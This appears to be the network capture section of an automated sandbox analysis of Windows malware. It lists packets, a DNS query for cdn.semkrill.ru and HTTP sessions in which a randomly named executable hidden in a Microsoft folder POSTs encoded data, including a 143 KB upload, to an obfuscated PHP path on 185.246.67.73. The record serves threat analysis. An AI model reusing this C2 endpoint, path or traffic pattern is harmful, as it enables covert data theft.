Dec 8, 2024 15:28:49.925431013 CET | 80 | 49930 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:49.925488949 CET | 49930 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:49.925580025 CET | 49930 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:49.925690889 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:49.926325083 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:50.044800997 CET | 80 | 49930 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:50.278917074 CET | 49930 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:50.398341894 CET | 80 | 49930 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:50.398392916 CET | 80 | 49930 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:50.398442984 CET | 80 | 49930 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:50.967353106 CET | 49930 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:50.967443943 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.087217093 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.087342024 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.087480068 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.087642908 CET | 80 | 49930 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.087734938 CET | 49930 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.088885069 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.206741095 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.208555937 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.210338116 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.210522890 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.329874039 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.438301086 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.557612896 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.557697058 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.560235977 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:51.679563999 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.679584980 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:51.679641008 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:52.407707930 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:52.450634003 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:52.535586119 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:52.591262102 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:52.644364119 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:52.685028076 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:52.768261909 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:52.810023069 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:52.885637999 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:52.885880947 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:52.886037111 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:53.009135962 CET | 80 | 49934 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:53.009258032 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:53.009443998 CET | 49934 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:53.009443998 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:53.009546995 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:53.009706974 CET | 80 | 49936 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:53.013540983 CET | 49936 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:53.129576921 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:53.356987000 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:53.476907969 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:53.476918936 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:53.476928949 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:54.329621077 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:54.372503996 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:54.568438053 CET | 80 | 49941 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:54.622499943 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:54.682605982 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:54.802436113 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:54.802495956 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:54.802606106 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:54.921871901 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:55.154283047 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:55.273700953 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:55.273720980 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:55.273802042 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:56.121335983 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:56.169348955 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.356427908 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:56.403724909 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.480048895 CET | 49941 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.480700016 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.480950117 CET | 49951 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.601083994 CET | 80 | 49951 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:56.601130009 CET | 49951 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.601273060 CET | 49951 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.601295948 CET | 80 | 49947 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:56.601341963 CET | 49947 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:56.720900059 CET | 80 | 49951 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:56.950685024 CET | 49951 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.070235014 CET | 80 | 49951 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.070286036 CET | 80 | 49951 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.070302963 CET | 80 | 49951 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.662230015 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.662924051 CET | 49951 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.781713009 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.782341957 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.782521009 CET | 80 | 49951 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.782557011 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.782638073 CET | 49951 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.822222948 CET | 49956 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.902354002 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.941570997 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:57.941658020 CET | 49956 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:57.941849947 CET | 49956 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:58.065922022 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:58.138880968 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:58.258661032 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:58.258699894 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:58.294572115 CET | 49956 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:58.414060116 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:58.414103985 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:58.414203882 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:59.171087027 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:59.217011929 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:59.336906910 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:59.390208006 CET | 49956 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:59.404311895 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:59.450692892 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:59.576364994 CET | 80 | 49956 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:59.622447014 CET | 49956 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:29:04.302771091 CET | 80 | 49955 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:29:04.302824974 CET | 49955 | 80 | 192.168.2.4 | 185.246.67.73
                                                                                                                      Dec 8, 2024 15:29:04.346678972 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:29:04.347377062 CET4995680192.168.2.4185.246.67.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 15:26:57.102055073 CET | 56582 | 53 | 192.168.2.4 | 1.1.1.1
Dec 8, 2024 15:26:57.532289982 CET | 53 | 56582 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 8, 2024 15:26:57.102055073 CET | 192.168.2.4 | 1.1.1.1 | 0xa88 | Standard query (0) | cdn.semkrill.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 8, 2024 15:26:57.532289982 CET | 1.1.1.1 | 192.168.2.4 | 0xa88 | No error (0) | cdn.semkrill.ru | | 172.67.184.109 | A (IP address) | IN (0x0001) | false
Dec 8, 2024 15:26:57.532289982 CET | 1.1.1.1 | 192.168.2.4 | 0xa88 | No error (0) | cdn.semkrill.ru | | 104.21.19.10 | A (IP address) | IN (0x0001) | false
• cdn.semkrill.ru
• 185.246.67.73
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:21.862191916 CET | 561 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:22.217119932 CET | 344 | OUT | Data Raw: 05 00 04 05 03 0c 04 02 05 06 02 01 02 04 01 05 00 0b 05 01 02 01 03 0a 07 0e 0d 0d 03 06 01 08 0f 52 05 01 03 03 03 0a 0e 05 04 05 04 0b 04 02 06 06 0e 0f 0c 06 07 00 01 06 03 00 06 01 00 08 01 05 0f 5b 04 07 01 08 0f 00 0b 04 0e 00 0e 06 05 07
Data Ascii: R[\Q\L~hfOwbyuuoQlbYwols]XolR[z`u^hnt`Ys[}e~V@@{SP~by
Dec 8, 2024 15:27:23.198961020 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:23.315932989 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1364
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 56 4a 7e 01 6f 53 51 4a 6c 62 74 48 6b 71 55 44 69 77 67 4f 7c 06 69 0d 7a 73 74 05 7d 72 74 4b 77 60 69 09 7a 4f 71 4a 62 76 60 03 69 61 78 01 55 4b 71 0c 74 72 5a 58 68 71 7e 58 7f 5e 61 55 6f 48 63 54 69 60 77 00 61 5c 61 4e 77 5f 5b 03 7e 72 69 5c 69 0a 78 09 7d 77 78 5e 75 4c 7b 06 7c 5b 71 05 7e 5e 72 5a 78 77 55 58 6f 59 6c 04 6f 53 55 00 6e 5b 6c 48 6c 05 6e 4f 7c 73 7c 4a 7b 74 7c 06 6a 62 77 06 62 5f 63 59 7a 51 41 5b 7f 5e 68 0a 6b 4f 75 43 75 52 68 4c 7a 6c 7b 5b 77 4e 62 0a 7a 4f 65 00 7e 7c 69 5a 6c 61 62 48 75 05 78 5b 75 72 6c 4c 63 58 62 50 7e 5d 7a 06 74 72 6d 01 76 65 5e 09 7f 7c 65 05 77 6f 60 04 7f 5d 6f 5b 78 6f 63 03 6c 06 76 01 7c 6d 6b 51 77 5e 7c 03 7e 62 62 09 69 54 67 42 78 0b 7a 4f 7e 4c 71 40 7b 5d 46 51 68 7c 7c 4e 7e 4e 70 0a 7d 01 7d 5d 78 7d 68 5b 7b 72 52 05 7f 4f 6b 4a 7e 74 63 0a 7c 70 61 42 79 5d 70 07 7e 5b 6f 5d 60 4d 5b 51 7b 5c 79 44 76 48 5a 4a 7e 48 56 07 7e 76 7d 0c 74 5c 55 00 7f 4c 57 01 7c 49 58 09 78 48 74 4f 7e 5d 51 02 76 5c 79 03 74 5f 5f 48 7c 4f [TRUNCATED]
Data Ascii: VJ~oSQJlbtHkqUDiwgO|izst}rtKw`izOqJbv`iaxUKqtrZXhq~X^aUoHcTi`wa\aNw_[~ri\ix}wx^uL{|[q~^rZxwUXoYloSUn[lHlnO|s|J{t|jbwb_cYzQA[^hkOuCuRhLzl{[wNbzOe~|iZlabHux[urlLcXbP~]ztrmve^|ewo`]o[xoclv|mkQw^|~bbiTgBxzO~Lq@{]FQh||N~Np}}]x}h[{rROkJ~tc|paBy]p~[o]`M[Q{\yDvHZJ~HV~v}t\ULW|IXxHtO~]Qv\yt__H|OfI~ld~wwvOkxry|pmIxIx{Ylxmxr^zc\|^|ywVJ}rwwqV}lo|YRaaNwlpLz|tt`vNyOy~|PN{_zuMUDv_ptab`Ttbmvu|O|RitBpcZIxlUEz`z}}|wwZ}Lz@|}{zmnO~\y}pVA||pA~`p}wT{}QxL`I~q{|g{A`}Ays^b^Ftc[ya}JvH`H}vh}fqtLU|riwfN{HhA~MUJuriw_aIqb~lRA}Y{Ivq{I{ruG~pa{g|C{Yxy}wzrRF{]PN{]NZxId|agOurliUgKYd@}quwl`xBYXwNPnb}jBP_z\y\}b`g{ZL~JxY}^cqn_asPR}tlYZ|DylRXxNP|C^w^pizzSYQgaeZS[_PscQVoMSsAjk}|PEZxrg\|Xk~wU~suy`p~alccSn_\^afd}X{_~f}QvXAZhfCQtKlUMkx\[nnZZiY~\z|Rd|YwJuLIx\_Ywr]ldCT{o[WnWnYPd~{__RJwiQ|Eq\BYi`DQtIhXL`sZo]G[]~}^\WAqlWyCq^AZbc@ZrOk_BarYbUNSS~Ccl\~^s|akA|YW_P{J]d]FRZAinRHW
Dec 8, 2024 15:27:23.316003084 CET | 357 | IN | Data Raw: 79 69 61 01 5b 7b 5e 5e 51 66 55 6f 0a 79 72 5d 4e 50 5e 44 5d 79 7a 78 5d 6c 61 08 46 53 7d 64 5d 52 64 03 5e 68 06 09 09 56 59 6b 4c 55 63 7b 47 63 70 65 51 7b 5c 7a 65 6d 4b 78 41 7a 5f 55 5b 52 01 7a 4b 5d 61 56 43 50 5a 09 5f 50 00 65 4c 52
Data Ascii: yia[{^^QfUoyr]NP^D]yzx]laFS}d]Rd^hVYkLUc{GcpeQ{\zemKxAz_U[RzK]aVCPZ_PeLRzsgZtDbeqpYnEPma]j{wmTttbmYyur^icDT{oZWdSoDSqYDo`cXl`|z]uq\BYi`DQtIhXL`w@WVcA[YaLPpXQof_z\y~Z|Yvwt[ba@Pc}_p_O\boNRHcU@iA[RZQca_{SVPww
Dec 8, 2024 15:27:23.353552103 CET | 537 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 384
Expect: 100-continue
Dec 8, 2024 15:27:23.700581074 CET | 384 | OUT | Data Raw: 55 5e 43 53 5e 43 50 52 54 5e 50 59 5b 5e 59 5a 59 5f 59 5c 57 50 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: U^CS^CPRT^PY[^YZY_Y\WPQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'Z&_*# =.B.]"+>8/'-#' %%(1"?;\,+ ]!![ 8
Dec 8, 2024 15:27:23.784945011 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:24.138971090 CET | 324 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Content-Type: text/html; charset=UTF-8
Data Raw: 06 13 39 12 31 25 05 56 29 2a 2e 5b 26 3c 33 5e 24 28 20 06 2a 0e 23 16 25 39 05 07 2c 29 37 1d 37 12 27 07 30 03 28 5c 20 3f 3f 50 2d 12 20 5a 06 10 22 05 26 01 3f 1f 28 3b 22 04 32 3b 35 0a 22 37 2b 45 30 3e 33 19 3e 14 08 17 34 2f 09 57 32 03 00 0b 39 1c 36 5e 26 30 01 1e 32 0c 2c 55 0f 1f 25 0c 33 0c 3b 55 22 24 22 1d 22 1e 23 17 26 1b 0c 56 36 2f 27 0a 2b 03 01 01 3f 21 3f 01 37 32 2f 5e 2e 2b 3a 05 2a 0b 3b 1d 30 06 20 53 2a 02 2e 54 0d 33 56 52
Data Ascii: 91%V)*.[&<3^$( *#%9,)77'0(\ ??P- Z"&?(;"2;5"7+E0>3>4/W296^&02,U%3;U"$""#&V6/'+?!?72/^.+:*;0 S*.T3VR
Dec 8, 2024 15:27:24.178987026 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 1904
Expect: 100-continue
Dec 8, 2024 15:27:24.528738976 CET | 1904 | OUT | Data Raw: 50 5f 43 52 5e 40 50 53 54 5e 50 59 5b 59 59 52 59 5f 59 57 57 5d 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: P_CR^@PST^PY[YYRY_YWW]QYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3&&Y5Y-]7X8830>X%3.%8! ,8 ]!![ $
Dec 8, 2024 15:27:24.610380888 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:24.968080044 CET | 324 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Content-Type: text/html; charset=UTF-8
Data Raw: 06 13 39 57 25 25 3f 52 2a 5c 35 03 32 05 23 5f 27 28 2c 06 2b 33 33 5c 27 07 23 07 2f 3a 05 13 20 05 28 5c 27 2e 30 13 22 02 2c 09 2e 02 20 5a 06 10 21 5f 24 2f 01 5b 2b 38 26 05 26 06 35 07 35 0e 24 19 24 2d 27 53 3d 3a 21 06 23 2c 2b 1f 32 2d 03 11 2f 25 00 59 25 56 2b 54 31 1c 2c 55 0f 1f 26 53 24 1c 2f 1c 34 0e 36 1c 22 0e 38 02 32 26 21 0a 35 3f 2c 56 28 2d 05 06 3c 0b 3b 04 34 32 06 07 2d 05 0b 16 2a 32 3f 1e 25 3c 20 53 2a 02 2e 54 0d 33 56 52
Data Ascii: 9W%%?R*\52#_'(,+33\'#/: (\'.0",. Z!_$/[+8&&55$$-'S=:!#,+2-/%Y%V+T1,U&S$/46"82&!5?,V(-<;42-*2?%< S*.T3VR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49744 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:23.554249048 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2580
Expect: 100-continue
Dec 8, 2024 15:27:23.904259920 CET | 2580 | OUT | Data Raw: 50 52 43 53 5b 45 55 56 54 5e 50 59 5b 58 59 52 59 5c 59 56 57 56 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: PRCS[EUVT^PY[XYRY\YVWVQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.X'5Z29!Z" 59"\ 8*Y;8+0.31>X&]"\7$8 ]!![
Dec 8, 2024 15:27:24.876287937 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:25.108330011 CET | 151 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:26.060688019 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Dec 8, 2024 15:27:26.419344902 CET | 2584 | OUT | Data Raw: 55 5c 46 57 5b 41 55 5f 54 5e 50 59 5b 51 59 5b 59 5c 59 5b 57 53 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: U\FW[AU_T^PY[QY[Y\Y[WSQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$=-%)=X6 !.B*\ [,(U'$^%5'8: ?'.; ]!![


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49746 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:26.923719883 CET | 608 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----QmKelCPMJNdPTxYb2WuoQ8QeKKO9Rja8qH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 143234
Expect: 100-continue
